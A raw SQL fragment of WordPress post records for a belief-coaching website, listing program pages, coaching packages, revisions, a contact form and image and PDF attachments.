(174, 4194, '2014-03-12 18:30:54', '2014-03-12 23:30:54', 'My Account Page Content', 'My Account', '', 'publish', 'closed', 'open', '', 'my-account', '', '', '2014-03-12 18:30:54', '2014-03-12 23:30:54', '', 0, 'http://beliefcloset.com/cyb/my-account', 0, 'page', '', 0),
(175, 4194, '2014-03-12 18:30:54', '2014-03-12 23:30:54', 'My Profile Page Content', 'My Profile', '', 'publish', 'closed', 'open', '', 'my-profile', '', '', '2014-03-12 18:30:54', '2014-03-12 23:30:54', '', 174, 'http://beliefcloset.com/cyb/my-account/my-profile', 0, 'page', '', 0),
(176, 4194, '2014-03-12 18:30:54', '2014-03-12 23:30:54', 'My Orders Page Content', 'My Orders', '', 'publish', 'closed', 'open', '', 'my-orders', '', '', '2014-03-12 18:30:54', '2014-03-12 23:30:54', '', 174, 'http://beliefcloset.com/cyb/my-account/my-orders', 0, 'page', '', 0),
(177, 4194, '2014-03-12 18:30:54', '2014-03-12 23:30:54', 'My Downloads Page Content', 'My Downloads', '', 'publish', 'closed', 'open', '', 'my-downloads', '', '', '2014-03-12 18:30:54', '2014-03-12 23:30:54', '', 174, 'http://beliefcloset.com/cyb/my-account/my-downloads', 0, 'page', '', 0),
(178, 4194, '2014-03-12 18:30:54', '2014-03-12 23:30:54', 'Password Recovery Confirmation Page Content', 'Password Recovery Confirmation', '', 'publish', 'closed', 'open', '', 'password-recovery-confirmation', '', '', '2014-03-12 18:30:54', '2014-03-12 23:30:54', '', 0, 'http://beliefcloset.com/cyb/password-recovery-confirmation', 0, 'page', '', 0),
(179, 4194, '2014-03-12 18:30:54', '2014-03-12 23:30:54', 'Categories Page Content', 'Categories', '', 'publish', 'closed', 'open', '', 'categories', '', '', '2014-03-12 18:30:54', '2014-03-12 23:30:54', '', 0, 'http://beliefcloset.com/cyb/categories', 0, 'page', '', 0),
(153, 4194, '2014-03-12 16:42:10', '2014-03-12 21:42:10', 'Get 30 min of coaching per week or per class', 'Buy program + 3.5 hours of coaching (PCP 2)', 'Get 30 min of coaching per week or per class', 'inherit', 'closed', 'open', '', '98-revision-v1', '', '', '2014-03-12 16:42:10', '2014-03-12 21:42:10', '', 98, 'http://beliefcloset.com/cyb/98-revision-v1', 0, 'revision', '', 0),
(1290, 2, '2014-07-13 13:09:46', '2014-07-13 18:09:46', '<h1 style="text-align: center;"><strong>The First Module of the 7-week\r\nClear Your Beliefs Program</strong></h1>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n&nbsp;\r\n&nbsp;\r\n', 'CYB First Class', '', 'publish', 'closed', 'open', '', 'firstclass', '', '', '2014-07-13 15:15:56', '2014-07-13 20:15:56', '', 0, 'http://clearyourbeliefs.com/?page_id=1290', 0, 'page', '', 0),
(1291, 2, '2014-07-13 13:09:46', '2014-07-13 18:09:46', '', 'CYB First Class', '', 'inherit', 'closed', 'open', '', '1290-revision-v1', '', '', '2014-07-13 13:09:46', '2014-07-13 18:09:46', '', 1290, 'http://clearyourbeliefs.com/1290-revision-v1', 0, 'revision', '', 0),
(171, 4194, '2014-03-12 18:30:54', '2014-03-12 23:30:54', 'Registration Page Content', 'Registration', '', 'publish', 'closed', 'open', '', 'registration', '', '', '2014-03-12 18:30:54', '2014-03-12 23:30:54', '', 0, 'http://beliefcloset.com/cyb/registration', 0, 'page', '', 0),
(170, 4194, '2014-03-12 18:30:54', '2014-03-12 23:30:54', 'Login Page Content', 'Login', '', 'publish', 'closed', 'open', '', 'login', '', '', '2014-03-12 18:30:54', '2014-03-12 23:30:54', '', 0, 'http://beliefcloset.com/cyb/login', 0, 'page', '', 0),
(187, 4194, '2014-03-13 04:25:20', '2014-03-13 09:25:20', 'Get 60 min of coaching per week or per class', 'Buy program + 7 hours of coaching (PCP 3)', 'Get 60 min of coaching per week or per class', 'inherit', 'closed', 'open', '', '99-revision-v1', '', '', '2014-03-13 04:25:20', '2014-03-13 09:25:20', '', 99, 'http://beliefcloset.com/cyb/99-revision-v1', 0, 'revision', '', 0),
(186, 4194, '2014-03-13 04:24:55', '2014-03-13 09:24:55', '', 'Buy the program &nbsp;&nbsp;&nbsp;alone', 'Buy the program alone', 'inherit', 'closed', 'open', '', '96-revision-v1', '', '', '2014-03-13 04:24:55', '2014-03-13 09:24:55', '', 96, 'http://beliefcloset.com/cyb/96-revision-v1', 0, 'revision', '', 0),
(188, 4194, '2014-03-13 04:29:05', '2014-03-13 09:29:05', 'Shopping Cart Page Content', 'Shopping Cart', '', 'inherit', 'closed', 'open', '', '172-revision-v1', '', '', '2014-03-13 04:29:05', '2014-03-13 09:29:05', '', 172, 'http://beliefcloset.com/cyb/172-revision-v1', 0, 'revision', '', 0),
(190, 4194, '2014-03-13 04:35:36', '2014-03-13 09:35:36', '', 'Buy the program alone', 'Buy the program alone', 'inherit', 'closed', 'open', '', '96-revision-v1', '', '', '2014-03-13 04:35:36', '2014-03-13 09:35:36', '', 96, 'http://beliefcloset.com/cyb/96-revision-v1', 0, 'revision', '', 0),
(191, 4194, '2014-03-13 04:36:19', '2014-03-13 09:36:19', '', 'Free 20 min consultation (FC) + Benefits eBook', '20 min consultation (FC) + Benefits eBook', 'inherit', 'closed', 'open', '', '100-revision-v1', '', '', '2014-03-13 04:36:19', '2014-03-13 09:36:19', '', 100, 'http://beliefcloset.com/cyb/100-revision-v1', 0, 'revision', '', 0),
(192, 4194, '2014-03-13 04:55:07', '2014-03-13 09:55:07', '', 'Buy the program &nbsp;&nbsp;alone', 'Buy the program alone', 'inherit', 'closed', 'open', '', '96-revision-v1', '', '', '2014-03-13 04:55:07', '2014-03-13 09:55:07', '', 96, 'http://beliefcloset.com/cyb/96-revision-v1', 0, 'revision', '', 0),
(193, 4194, '2014-03-13 15:38:13', '2014-03-13 20:38:13', '', 'newold-300x198', '', 'inherit', 'closed', 'open', '', 'newold-300x198', '', '', '2014-03-13 15:38:13', '2014-03-13 20:38:13', '', 100, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/03/newold-300x198.jpg', 0, 'attachment', 'image/jpeg', 0),
(196, 4194, '2014-03-13 17:40:35', '2014-03-13 22:40:35', '[vfb id=1]', 'Checkout', '', 'inherit', 'closed', 'open', '', '86-revision-v1', '', '', '2014-03-13 17:40:35', '2014-03-13 22:40:35', '', 86, 'http://beliefcloset.com/cyb/86-revision-v1', 0, 'revision', '', 0),
(197, 4194, '2014-03-13 17:41:12', '2014-03-13 22:41:12', '[vfb id=1]', 'Register', '', 'inherit', 'closed', 'open', '', '86-revision-v1', '', '', '2014-03-13 17:41:12', '2014-03-13 22:41:12', '', 86, 'http://beliefcloset.com/cyb/86-revision-v1', 0, 'revision', '', 0),
(199, 4194, '2014-03-14 10:18:32', '2014-03-14 15:18:32', 'Get 30 min of coaching per week or per class', 'Buy program + 3.5 hours of coaching (PCP 1)', 'Get 30 min of coaching per week or per class', 'inherit', 'closed', 'open', '', '98-revision-v1', '', '', '2014-03-14 10:18:32', '2014-03-14 15:18:32', '', 98, 'http://beliefcloset.com/cyb/98-revision-v1', 0, 'revision', '', 0),
(200, 4194, '2014-03-14 10:20:47', '2014-03-14 15:20:47', 'Get 60 min of coaching per week or per class', 'Buy program + 7 hours of coaching (PCP 2)', 'Get 60 min of coaching per week or per class', 'inherit', 'closed', 'open', '', '99-revision-v1', '', '', '2014-03-14 10:20:47', '2014-03-14 15:20:47', '', 99, 'http://beliefcloset.com/cyb/99-revision-v1', 0, 'revision', '', 0),
(202, 4194, '2014-03-14 10:48:20', '2014-03-14 15:48:20', '', 'Packages', '', 'publish', 'closed', 'open', '', 'coaching-packages', '', '', '2015-03-17 21:34:26', '2015-03-18 02:34:26', '', 0, 'http://beliefcloset.com/cyb/?p=202', 6, 'nav_menu_item', '', 0),
(1079, 4194, '2014-06-25 13:36:47', '2014-06-25 18:36:47', ' ', '', '', 'publish', 'closed', 'open', '', '1079', '', '', '2015-03-17 21:34:26', '2015-03-18 02:34:26', '', 0, 'http://clearyourbeliefs.com/?p=1079', 8, 'nav_menu_item', '', 0),
(1080, 4194, '2014-06-25 13:40:08', '2014-06-25 18:40:08', '<h1>Contact us with any questions</h1>\n\n\n\n<div class="icon_box" style="width: 50%; margin: 30px auto;">\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/9273610ad1b435283befa0d2b3134fad" method="POST"><input name="inf_form_xid" type="hidden" value="9273610ad1b435283befa0d2b3134fad" /><input name="inf_form_name" type="hidden" value="Contact Us Webform" />\n\n<input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\n<div class="infusion-field">\n\n<label for="inf_field_FirstName">First Name *</label>\n\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\n\n</div>\n<div class="infusion-field">\n\n<label for="inf_field_Email">Email *</label>\n\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\n\n</div>\n<div class="infusion-field">\n\n<label for="inf_field_Phone1">Phone Number</label>\n\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\n\n</div>\n<div class="infusion-field">\n\n<label for="inf_custom_ContactUsRequest">Describe the nature of your request. </label>\n\n<textarea id="inf_custom_ContactUsRequest" cols="24" name="inf_custom_ContactUsRequest" rows="5">&lt;/p&gt;&lt;br /&gt;\n&lt;p&gt;    </textarea>\n\n</div>\n<div class="infusion-submit">\n\n<input type="submit" value="Submit" />\n\n</div>\n</form>\n', 'Contact', '', 'inherit', 'closed', 'open', '', '120-autosave-v1', '', '', '2014-06-25 13:40:08', '2014-06-25 18:40:08', '', 120, 'http://clearyourbeliefs.com/120-autosave-v1', 0, 'revision', '', 0),
(208, 4194, '2014-03-14 10:48:20', '2014-03-14 15:48:20', ' ', '', '', 'publish', 'closed', 'open', '', '208', '', '', '2015-03-17 21:34:26', '2015-03-18 02:34:26', '', 0, 'http://beliefcloset.com/cyb/?p=208', 4, 'nav_menu_item', '', 0),
(210, 4194, '2014-03-21 17:24:21', '2014-03-21 22:24:21', '<h4 style="text-align: center;">Thank you for registering for coaching.</h4>\r\n<p style="text-align: center;">A practitioner will be contacting you in the next 72 hrs to arrange a time to meet with you.</p>\r\n<p style="text-align: center;">Feel free to <a title="Contact Us" href="http://beliefcloset.com/cyb/contact">contact us</a> with any questions.</p>', 'Next Step', '', 'publish', 'closed', 'open', '', 'next-step', '', '', '2014-03-21 17:26:19', '2014-03-21 22:26:19', '', 0, 'http://beliefcloset.com/cyb/?page_id=210', 0, 'page', '', 0),
(211, 4194, '2014-03-21 17:24:21', '2014-03-21 22:24:21', '<h4 style="text-align: center;">Thank you for registering for coaching.</h4>\r\n<p style="text-align: center;">A practitioner will be contacting you in the next 72 hrs to arrange a time to meet with you.</p>\r\n<p style="text-align: center;">Feel free to contact us with any questions.</p>', 'Next Step', '', 'inherit', 'closed', 'open', '', '210-revision-v1', '', '', '2014-03-21 17:24:21', '2014-03-21 22:24:21', '', 210, 'http://beliefcloset.com/cyb/210-revision-v1', 0, 'revision', '', 0),
(212, 4194, '2014-03-21 17:25:53', '2014-03-21 22:25:53', '<h4 style="text-align: center;">Thank you for registering for coaching.</h4>\n<p style="text-align: center;">A practitioner will be contacting you in the next 72 hrs to arrange a time to meet with you.</p>\n<p style="text-align: center;">Feel free to contact us with any questions.</p>', 'Next Step', '', 'inherit', 'closed', 'open', '', '210-autosave-v1', '', '', '2014-03-21 17:25:53', '2014-03-21 22:25:53', '', 210, 'http://beliefcloset.com/cyb/210-autosave-v1', 0, 'revision', '', 0),
(213, 4194, '2014-03-21 17:26:19', '2014-03-21 22:26:19', '<h4 style="text-align: center;">Thank you for registering for coaching.</h4>\r\n<p style="text-align: center;">A practitioner will be contacting you in the next 72 hrs to arrange a time to meet with you.</p>\r\n<p style="text-align: center;">Feel free to <a title="Contact Us" href="http://beliefcloset.com/cyb/contact">contact us</a> with any questions.</p>', 'Next Step', '', 'inherit', 'closed', 'open', '', '210-revision-v1', '', '', '2014-03-21 17:26:19', '2014-03-21 22:26:19', '', 210, 'http://beliefcloset.com/cyb/210-revision-v1', 0, 'revision', '', 0),
(216, 4194, '2014-04-10 12:31:01', '2014-04-10 17:31:01', 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/index_bg.jpg', 'index_bg.jpg', '', 'inherit', 'closed', 'open', '', 'index_bg-jpg', '', '', '2014-04-10 12:31:01', '2014-04-10 17:31:01', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/index_bg.jpg', 0, 'attachment', 'image/jpeg', 0),
(217, 4194, '2014-04-10 12:33:53', '2014-04-10 17:33:53', 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/index_bg1.jpg', 'index_bg1.jpg', '', 'inherit', 'closed', 'open', '', 'index_bg1-jpg', '', '', '2014-04-10 12:33:53', '2014-04-10 17:33:53', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/index_bg1.jpg', 0, 'attachment', 'image/jpeg', 0),
(230, 4194, '2014-04-23 10:28:44', '2014-04-23 15:28:44', '', 'bon4', '', 'inherit', 'closed', 'open', '', 'bon4', '', '', '2014-04-23 10:28:44', '2014-04-23 15:28:44', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon4.jpg', 0, 'attachment', 'image/jpeg', 0),
(303, 4194, '2014-04-24 07:56:38', '2014-04-24 12:56:38', '', 'lion-face', '', 'inherit', 'closed', 'open', '', 'lion-face-3', '', '', '2014-04-24 07:56:38', '2014-04-24 12:56:38', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/02/lion-face.jpg', 0, 'attachment', 'image/jpeg', 0),
(375, 4194, '2014-04-24 15:07:31', '2014-04-24 20:07:31', '', 'sess2', '', 'inherit', 'closed', 'open', '', 'sess2-2', '', '', '2014-04-24 15:07:31', '2014-04-24 20:07:31', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg', 0, 'attachment', 'image/jpeg', 0),
(237, 4194, '2014-04-23 10:29:06', '2014-04-23 15:29:06', '', 'guarantee', '', 'inherit', 'closed', 'open', '', 'guarantee', '', '', '2014-04-23 10:29:06', '2014-04-23 15:29:06', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/guarantee.jpg', 0, 'attachment', 'image/jpeg', 0),
(242, 4194, '2014-04-23 10:31:37', '2014-04-23 15:31:37', '', 'bon2', '', 'inherit', 'closed', 'open', '', 'bon2-2', '', '', '2014-04-23 10:31:37', '2014-04-23 15:31:37', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg', 0, 'attachment', 'image/jpeg', 0),
(244, 4194, '2014-04-23 10:31:47', '2014-04-23 15:31:47', '', 'brain', '', 'inherit', 'closed', 'open', '', 'brain-2', '', '', '2014-04-23 10:31:47', '2014-04-23 15:31:47', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain1.jpg', 0, 'attachment', 'image/jpeg', 0),
(246, 4194, '2014-04-23 10:31:50', '2014-04-23 15:31:50', '', 'brain-tree', '', 'inherit', 'closed', 'open', '', 'brain-tree-2', '', '', '2014-04-23 10:31:50', '2014-04-23 15:31:50', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg', 0, 'attachment', 'image/jpeg', 0),
(248, 4194, '2014-04-23 10:31:54', '2014-04-23 15:31:54', '', 'eye', '', 'inherit', 'closed', 'open', '', 'eye-2', '', '', '2014-04-23 10:31:54', '2014-04-23 15:31:54', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/eye1.jpg', 0, 'attachment', 'image/jpeg', 0),
(249, 4194, '2014-04-23 10:31:56', '2014-04-23 15:31:56', '', 'global', '', 'inherit', 'closed', 'open', '', 'global-2', '', '', '2014-04-23 10:31:56', '2014-04-23 15:31:56', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1.jpg', 0, 'attachment', 'image/jpeg', 0),
(250, 4194, '2014-04-23 10:31:58', '2014-04-23 15:31:58', '', 'guarantee', '', 'inherit', 'closed', 'open', '', 'guarantee-2', '', '', '2014-04-23 10:31:58', '2014-04-23 15:31:58', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/guarantee1.jpg', 0, 'attachment', 'image/jpeg', 0),
(253, 4194, '2014-04-23 10:32:18', '2014-04-23 15:32:18', '', 'key', '', 'inherit', 'closed', 'open', '', 'key-2', '', '', '2014-04-23 10:32:18', '2014-04-23 15:32:18', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg', 0, 'attachment', 'image/jpeg', 0),
(256, 4194, '2014-04-23 10:32:37', '2014-04-23 15:32:37', '', 'lion-signature', '', 'inherit', 'closed', 'open', '', 'lion-signature', '', '', '2014-04-23 10:32:37', '2014-04-23 15:32:37', '', 139, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature.jpg', 0, 'attachment', 'image/jpeg', 0),
(304, 4194, '2014-04-24 07:56:42', '2014-04-24 12:56:42', '', 'lion-full', '', 'inherit', 'closed', 'open', '', 'lion-full-2', '', '', '2014-04-24 07:56:42', '2014-04-24 12:56:42', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/02/lion-full.jpg', 0, 'attachment', 'image/jpeg', 0),
(265, 4194, '2014-04-23 10:34:20', '2014-04-23 15:34:20', '', 'sess7', '', 'inherit', 'closed', 'open', '', 'sess7', '', '', '2014-04-23 10:34:20', '2014-04-23 15:34:20', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg', 0, 'attachment', 'image/jpeg', 0),
(299, 4194, '2014-04-24 07:40:16', '2014-04-24 12:40:16', '', 'brain', '', 'inherit', 'closed', 'open', '', 'brain-3', '', '', '2014-04-24 07:40:16', '2014-04-24 12:40:16', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg', 0, 'attachment', 'image/jpeg', 0),
(300, 4194, '2014-04-24 07:40:18', '2014-04-24 12:40:18', '', 'header-img', '', 'inherit', 'closed', 'open', '', 'header-img-3', '', '', '2014-04-24 07:40:18', '2014-04-24 12:40:18', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg', 0, 'attachment', 'image/jpeg', 0),
(298, 4194, '2014-04-24 07:38:11', '2014-04-24 12:38:11', '', 'react', '', 'inherit', 'closed', 'open', '', 'react-2', '', '', '2014-04-24 07:38:11', '2014-04-24 12:38:11', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1.jpg', 0, 'attachment', 'image/jpeg', 0),
(297, 4194, '2014-04-24 07:38:10', '2014-04-24 12:38:10', '', 'puddle', '', 'inherit', 'closed', 'open', '', 'puddle-3', '', '', '2014-04-24 07:38:10', '2014-04-24 12:38:10', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1.jpg', 0, 'attachment', 'image/jpeg', 0),
(296, 4194, '2014-04-24 07:38:08', '2014-04-24 12:38:08', '', 'mother-daughter', '', 'inherit', 'closed', 'open', '', 'mother-daughter-2', '', '', '2014-04-24 07:38:08', '2014-04-24 12:38:08', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2.jpg', 0, 'attachment', 'image/jpeg', 0),
(295, 4194, '2014-04-24 07:32:52', '2014-04-24 12:32:52', '', 'studied', '', 'inherit', 'closed', 'open', '', 'studied-3', '', '', '2016-03-11 18:27:09', '2016-03-11 23:27:09', '', 2244, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg', 0, 'attachment', 'image/jpeg', 0),
(302, 4194, '2014-04-24 07:56:23', '2014-04-24 12:56:23', '', 'joy', '', 'inherit', 'closed', 'open', '', 'joy-3', '', '', '2014-04-24 07:56:23', '2014-04-24 12:56:23', '', 2121, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1.jpg', 0, 'attachment', 'image/jpeg', 0),
(305, 4194, '2014-04-24 07:56:44', '2014-04-24 12:56:44', '', 'mother-daughter1', '', 'inherit', 'closed', 'open', '', 'mother-daughter1', '', '', '2014-04-24 07:56:44', '2014-04-24 12:56:44', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mother-daughter1.jpg', 0, 'attachment', 'image/jpeg', 0),
(309, 4194, '2014-04-24 08:17:54', '2014-04-24 13:17:54', '', 'mod1', '', 'inherit', 'closed', 'open', '', 'mod1-3', '', '', '2014-04-24 08:17:54', '2014-04-24 13:17:54', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg', 0, 'attachment', 'image/jpeg', 0),
(311, 4194, '2014-04-24 08:17:57', '2014-04-24 13:17:57', '', 'sess3', '', 'inherit', 'closed', 'open', '', 'sess3-2', '', '', '2014-04-24 08:17:57', '2014-04-24 13:17:57', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg', 0, 'attachment', 'image/jpeg', 0),
(312, 4194, '2014-04-24 08:17:58', '2014-04-24 13:17:58', '', 'sess4', '', 'inherit', 'closed', 'open', '', 'sess4-2', '', '', '2014-04-24 08:17:58', '2014-04-24 13:17:58', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg', 0, 'attachment', 'image/jpeg', 0),
(313, 4194, '2014-04-24 08:17:59', '2014-04-24 13:17:59', '', 'sess5', '', 'inherit', 'closed', 'open', '', 'sess5-2', '', '', '2014-04-24 08:17:59', '2014-04-24 13:17:59', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg', 0, 'attachment', 'image/jpeg', 0),
(314, 4194, '2014-04-24 08:18:00', '2014-04-24 13:18:00', '', 'sess6', '', 'inherit', 'closed', 'open', '', 'sess6', '', '', '2014-04-24 08:18:00', '2014-04-24 13:18:00', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg', 0, 'attachment', 'image/jpeg', 0),
(315, 4194, '2014-04-24 08:18:01', '2014-04-24 13:18:01', '', 'shift', '', 'inherit', 'closed', 'open', '', 'shift-2', '', '', '2014-04-24 08:18:01', '2014-04-24 13:18:01', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg', 0, 'attachment', 'image/jpeg', 0),
(316, 4194, '2014-04-24 08:18:03', '2014-04-24 13:18:03', '', 'simply', '', 'inherit', 'closed', 'open', '', 'simply-2', '', '', '2014-04-24 08:18:03', '2014-04-24 13:18:03', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply.jpg', 0, 'attachment', 'image/jpeg', 0),
(317, 4194, '2014-04-24 08:18:04', '2014-04-24 13:18:04', '', 'stone-doorway', '', 'inherit', 'closed', 'open', '', 'stone-doorway-2', '', '', '2014-04-24 08:18:04', '2014-04-24 13:18:04', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg', 0, 'attachment', 'image/jpeg', 0),
(318, 4194, '2014-04-24 08:18:05', '2014-04-24 13:18:05', '', 'support', '', 'inherit', 'closed', 'open', '', 'support-2', '', '', '2014-04-24 08:18:05', '2014-04-24 13:18:05', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg', 0, 'attachment', 'image/jpeg', 0),
(320, 4194, '2014-04-24 08:40:00', '2014-04-24 13:40:00', '', 'construction-300x224', '', 'inherit', 'closed', 'open', '', 'construction-300x224', '', '', '2014-04-24 08:40:00', '2014-04-24 13:40:00', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg', 0, 'attachment', 'image/jpeg', 0),
(321, 4194, '2014-04-24 08:40:02', '2014-04-24 13:40:02', '', 'dilap', '', 'inherit', 'closed', 'open', '', 'dilap', '', '', '2014-04-24 08:40:02', '2014-04-24 13:40:02', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg', 0, 'attachment', 'image/jpeg', 0),
(322, 4194, '2014-04-24 08:40:05', '2014-04-24 13:40:05', '', 'glasses1-300x256', '', 'inherit', 'closed', 'open', '', 'glasses1-300x256', '', '', '2014-04-24 08:40:05', '2014-04-24 13:40:05', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg', 0, 'attachment', 'image/jpeg', 0),
(323, 4194, '2014-04-24 08:40:06', '2014-04-24 13:40:06', '', 'water-300x201', '', 'inherit', 'closed', 'open', '', 'water-300x201', '', '', '2014-04-24 08:40:06', '2014-04-24 13:40:06', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg', 0, 'attachment', 'image/jpeg', 0),
(324, 4194, '2014-04-24 08:40:07', '2014-04-24 13:40:07', '', 'weedjpg-300x199', '', 'inherit', 'closed', 'open', '', 'weedjpg-300x199', '', '', '2014-04-24 08:40:07', '2014-04-24 13:40:07', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg', 0, 'attachment', 'image/jpeg', 0),
(328, 4194, '2014-04-24 09:00:28', '2014-04-24 14:00:28', '', 'brain-open', '', 'inherit', 'closed', 'open', '', 'brain-open', '', '', '2014-04-24 09:00:28', '2014-04-24 14:00:28', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg', 0, 'attachment', 'image/jpeg', 0),
(378, 4194, '2014-04-24 15:18:25', '2014-04-24 20:18:25', '', 'bon1', '', 'inherit', 'closed', 'open', '', 'bon1', '', '', '2014-04-24 15:18:25', '2014-04-24 20:18:25', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg', 0, 'attachment', 'image/jpeg', 0),
(384, 4194, '2014-04-24 15:43:54', '2014-04-24 20:43:54', '', 'lion-full1', '', 'inherit', 'closed', 'open', '', 'lion-full1', '', '', '2014-04-24 15:43:54', '2014-04-24 20:43:54', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-full1.jpg', 0, 'attachment', 'image/jpeg', 0),
(386, 4194, '2014-04-24 15:48:59', '2014-04-24 20:48:59', '', 'lion-full2', '', 'inherit', 'closed', 'open', '', 'lion-full2', '', '', '2014-04-24 15:48:59', '2014-04-24 20:48:59', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-full2.jpg', 0, 'attachment', 'image/jpeg', 0),
(396, 4194, '2014-04-24 16:09:54', '2014-04-24 21:09:54', '', 'bon3', '', 'inherit', 'closed', 'open', '', 'bon3', '', '', '2014-04-24 16:09:54', '2014-04-24 21:09:54', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg', 0, 'attachment', 'image/jpeg', 0),
(430, 2, '2014-05-05 01:31:45', '2014-05-05 06:31:45', '', 'TYB final Cover', '', 'inherit', 'closed', 'open', '', 'tyb-final-cover', '', '', '2014-05-05 01:31:45', '2014-05-05 06:31:45', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-final-Cover.pdf', 0, 'attachment', 'application/pdf', 0),
(432, 2, '2014-05-05 01:46:51', '2014-05-05 06:46:51', '', '9165089', '', 'inherit', 'closed', 'open', '', '9165089', '', '', '2014-05-05 01:46:51', '2014-05-05 06:46:51', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/9165089.jpg', 0, 'attachment', 'image/jpeg', 0),
(433, 2, '2014-05-05 01:47:45', '2014-05-05 06:47:45', '', 'TYB Cover', '', 'inherit', 'closed', 'open', '', 'tyb-cover', '', '', '2014-05-05 01:47:45', '2014-05-05 06:47:45', '', 1421, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg', 0, 'attachment', 'image/jpeg', 0),
(475, 4194, '2014-05-07 16:34:53', '2014-05-07 21:34:53', '', 'creating-on-purpose', '', 'inherit', 'closed', 'open', '', 'creating-on-purpose', '', '', '2014-05-07 16:34:53', '2014-05-07 21:34:53', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg', 0, 'attachment', 'image/jpeg', 0),
(488, 4194, '2014-05-07 17:55:15', '2014-05-07 22:55:15', 'http://beliefcloset.com/cyb/wp-content/uploads/2014/05/index_bg1.jpg', 'index_bg1.jpg', '', 'inherit', 'closed', 'open', '', 'index_bg1-jpg-2', '', '', '2014-05-07 17:55:15', '2014-05-07 22:55:15', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/05/index_bg1.jpg', 0, 'attachment', 'image/jpeg', 0),
(490, 4194, '2014-05-07 19:47:33', '2014-05-08 00:47:33', '', 'lion-signature-300x70', '', 'inherit', 'closed', 'open', '', 'lion-signature-300x70', '', '', '2014-05-07 19:47:33', '2014-05-08 00:47:33', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png', 0, 'attachment', 'image/png', 0),
(2062, 2, '2014-12-29 23:03:06', '2014-12-30 04:03:06', '', 'Clear Your Beliefs eBook v.4.0', '', 'inherit', 'closed', 'open', '', 'clear-your-beliefs-ebook-v-4-0', '', '', '2014-12-29 23:03:06', '2014-12-30 04:03:06', '', 2061, 'http://clearyourbeliefs.com/wp-content/uploads/2014/12/Clear-Your-Beliefs-eBook-v.4.0.pdf', 0, 'attachment', 'application/pdf', 0),
